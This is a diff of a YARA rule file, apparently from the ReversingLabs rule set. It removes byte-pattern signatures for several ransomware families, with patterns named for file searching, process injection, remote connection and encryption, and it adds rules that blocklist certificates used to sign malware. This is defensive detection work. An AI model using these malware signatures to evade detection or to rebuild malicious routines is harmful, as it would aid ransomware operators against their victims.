+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14148-L14166"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "02cfdf883212387a465af3e692b29b8d0eb8249e0a260f18bec2f662d775b606"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HentaiOniichan"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
-            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
-            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
-            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
-            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
-            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
-        }
-		$find_files_p2 = {
-            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
-            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
-            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
-            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
-            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$inject_code_into_process = {
-            33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 8B C6 8D 8D
-            ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83
-            C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ?? ??
-            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 15 ?? ?? ?? ?? 39 85 ?? ?? ?? ??
-            74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ??
-            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
-            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ??
-            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
-            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ??
-            ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B
-            4D ?? 85 C9 74 ?? 51 8B D0 E8 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ??
-            2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 8D 0C 40 8B C6 C1 E1 ?? 81 F9 ?? ?? ?? ??
-            72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3
-            5B C3 E8
-        }
-		$remote_connection_p1 = {
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45
-            ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 28 45
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45 ?? 0F 28 45
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45 ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 0F 29 45 ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45
-        }
-		$remote_connection_p2 = {
-            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45
-            ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41
-            ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ??
-            ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51
-            0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            0F 43 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 6A ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 50 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 FA ?? 72 ?? 8B
-            8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4
-        }
-		$encrypt_files = {
-            8B FF 55 8B EC 83 EC ?? 8B 4D ?? 89 4D ?? 53 56 8B 75 ?? 57 8B 7D ?? 89 7D ?? 85 C9
-            0F 84 ?? ?? ?? ?? 85 FF 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B C6 8B D6 C1 FA ?? 83 E0 ?? 6B C0 ?? 89
-            55 ?? 8B 14 95 ?? ?? ?? ?? 89 45 ?? 8A 5C 02 ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1
-            F7 D0 A8 ?? 74 ?? 8B 45 ?? F6 44 02 ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 56 E8 ?? ?? ?? ?? 59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 0F 87 ?? ?? ??
-            ?? FF 75 ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8D
-            45 ?? 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 0C 85 ?? ?? ?? ?? 8B 45 ??
-            80 7C 01 ?? ?? 7D ?? 0F BE C3 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 0F 85 ?? ?? ??
-            ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ??
-            ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 01 ?? 8D 7D ??
-            33 C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            FF 15 ?? ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 45 ?? 85 C0 75 ?? 8B 45 ??
-            85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
-            30 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? 8B 4D ?? 8B
-            04 85 ?? ?? ?? ?? F6 44 08 ?? ?? 74 ?? 80 3F ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 20 ?? E9 ?? ?? ?? ?? 2B 45 ?? EB ?? 33 C0 5F 5E 5B C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $inject_code_into_process ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\xA4\\xA9\\xE6\\xB8\\xB8\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:ed:9c:ae:b7:91:1b:31:bd" or pe.signatures [ i ] . serial == "ed:9c:ae:b7:91:1b:31:bd" ) and 1506001740 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Saturn : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Saturn ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "70a8d937-aee5-54d8-9409-c5d2d0830a2b"
-		date = "2020-10-19"
-		modified = "2020-10-19"
+		id = "125c0b95-82bb-5900-8e8c-4359b8cd18ab"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Saturn.yara#L1-L105"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "efa748346ad8c46e654542d302e81d633a2d12f421636c477431a12a34636132"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14168-L14184"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6b5cc47f4df9e57c59bc66c32188e02390d4855a1b9e56bd7471fd641a245c3c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Saturn"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_1 = {
-            6A ?? C6 45 ?? ?? 8D 4D ?? 8B 3B 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 3B C8 74 ??
-            83 78 ?? ?? 8B C8 72 ?? 8B 08 FF 70 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A
-        }
-		$find_files_2_p1 = {
-            68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? FF 75
-            ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D
-            4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85
-            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ??
-            0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ??
-            ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50
-            8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83
-        }
-		$find_files_2_p2 = {
-            F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF
-            15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B F0 80
-            BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 00
-            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B D0
-            8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? F6
-            85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E9
-        }
-		$encrypt_files_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 89 9D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 6A ?? FF B5
-            ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF D6 8B D8
-            83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 57
-            FF D6 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3
-            A5 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF B5 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ??
-            ?? ?? ?? 85 F6 0F 95 C3 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 89 B5 ?? ?? ?? ?? 56 53 FF
-        }
-		$encrypt_files_p2 = {
-            15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 56 ?? 8B 85 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 C8 8D 85 ?? ?? ?? ??
-            3B 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 6A ?? 0F 44 F2 56 6A ??
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 BA ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 FF B5
-            ?? ?? ?? ?? FF D6 B3 ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ??
-            ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77
-            ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B
-            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAR AND CILLA LTD" and pe.signatures [ i ] . serial == "0f:d2:b1:9a:94:1b:70:09:cc:72:8a:37:cb:1b:10:b9" and 1560470400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Mountlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MountLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8ce7e5c4-9eca-5dd2-ab92-39b915900d72"
-		date = "2021-03-25"
-		modified = "2021-03-25"
+		id = "0e844bef-1cfe-5eba-af4d-d8477e55470c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.MountLocker.yara#L1-L86"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d203217c229d54802e96e19dc66d38ecb0443d19e0492efe337df471a99559dc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14186-L14202"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
